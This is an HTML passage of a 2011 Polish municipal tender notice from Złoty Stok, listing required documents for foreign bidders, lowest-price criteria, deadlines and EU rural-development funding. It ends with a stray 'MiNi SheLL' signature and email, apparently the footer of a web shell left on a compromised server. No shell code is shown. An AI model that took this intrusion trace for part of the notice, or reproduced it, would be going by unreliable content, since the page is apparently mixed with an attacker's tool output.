<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenia wykające ze SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zlotystok.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Złotym Stoku
Rynek 22
57-250 Złoty Stok
pok. 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2011 godzina 10:00, miejsce: Urząd Miejski w Złotym Stoku
Rynek 22
57-250 Złoty Stok
pok. 7 sekretariat Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007-2013	          

Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich
Europa inwestująca w obszary wiejskie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com